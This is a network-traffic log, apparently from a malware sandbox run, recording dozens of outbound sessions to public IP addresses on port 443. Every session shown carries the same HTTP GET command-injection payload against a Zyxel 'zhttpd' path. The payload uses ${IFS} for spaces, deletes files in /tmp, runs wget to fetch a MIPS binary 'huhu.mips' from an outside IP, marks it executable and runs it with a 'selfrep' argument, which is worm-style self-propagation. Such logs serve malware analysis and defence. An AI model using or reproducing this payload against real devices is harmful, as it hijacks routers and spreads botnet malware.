                                      Jan 19, 2024 17:29:35.841264963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5241192.168.2.1436998187.136.4.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841320038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5242192.168.2.1439006156.174.253.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841351032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5243192.168.2.1444224187.188.88.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841372013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5244192.168.2.143697647.14.126.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841427088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5245192.168.2.1447986202.28.109.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841454983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5246192.168.2.145141440.27.188.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841517925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5247192.168.2.143880643.131.163.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841571093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5248192.168.2.145489099.232.186.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841622114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5249192.168.2.1447064122.20.33.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841634989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5250192.168.2.1460290212.69.120.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841680050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5251192.168.2.144442852.188.212.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841697931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5252192.168.2.145511065.64.240.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841720104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5253192.168.2.144454087.47.56.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841774940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5254192.168.2.1453908153.234.162.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841810942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5255192.168.2.14567642.203.141.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841852903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5256192.168.2.1453110190.48.143.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841908932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5257192.168.2.1440026183.0.62.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841945887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5258192.168.2.1445818186.228.105.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.841972113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5259192.168.2.1459306134.205.213.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842000961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5260192.168.2.1458122121.110.158.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842060089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5261192.168.2.144278294.84.70.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842106104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5262192.168.2.143896067.187.32.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842135906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5263192.168.2.1445286185.214.147.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842160940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5264192.168.2.1441076166.189.181.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842209101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5265192.168.2.1460652213.34.245.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842247963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5266192.168.2.144852490.100.28.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842276096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5267192.168.2.1455086134.158.196.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842344999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5268192.168.2.144914460.131.193.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842370033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5269192.168.2.144093846.56.95.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842421055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5270192.168.2.1444614202.49.165.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842462063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5271192.168.2.1454508122.70.226.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842504978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5272192.168.2.1438888141.163.84.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842544079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5273192.168.2.144194671.128.193.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842600107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5274192.168.2.1458582110.31.133.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842633009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5275192.168.2.1438604151.67.238.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842691898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5276192.168.2.1444746176.80.208.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842715979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5277192.168.2.143292037.134.15.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842777014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5278192.168.2.1454418206.110.168.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842808962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5279192.168.2.1456114195.50.28.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842842102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5280192.168.2.1436176134.222.194.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842871904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5281192.168.2.1460888218.219.241.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842931032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5282192.168.2.144579292.36.5.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.842958927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5283192.168.2.145089077.103.121.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843008041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5284192.168.2.144562023.73.133.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843033075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5285192.168.2.1441340184.76.92.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843076944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5286192.168.2.146026887.105.2.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843122959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5287192.168.2.1456030154.53.213.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843166113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5288192.168.2.14480808.141.224.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843188047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5289192.168.2.1455408109.235.249.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843209982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5290192.168.2.1449954144.132.90.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843251944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5291192.168.2.144066699.111.63.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843302965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5292192.168.2.1444512202.26.251.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843354940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5293192.168.2.144488031.215.125.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843411922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5294192.168.2.1452756118.25.82.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843456030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5295192.168.2.1452278157.117.46.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843470097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5296192.168.2.144437284.212.48.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843513966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5297192.168.2.1436094126.230.208.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843544006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5298192.168.2.145538899.246.240.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843580961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5299192.168.2.1451648201.164.15.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843627930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5300192.168.2.145926445.7.162.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843648911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5301192.168.2.143318085.62.72.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843681097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5302192.168.2.14423684.244.113.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843728065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5303192.168.2.1460358152.248.17.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843764067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5304192.168.2.1457074135.237.252.90443
                                      TimestampBytes transferredDirectionData
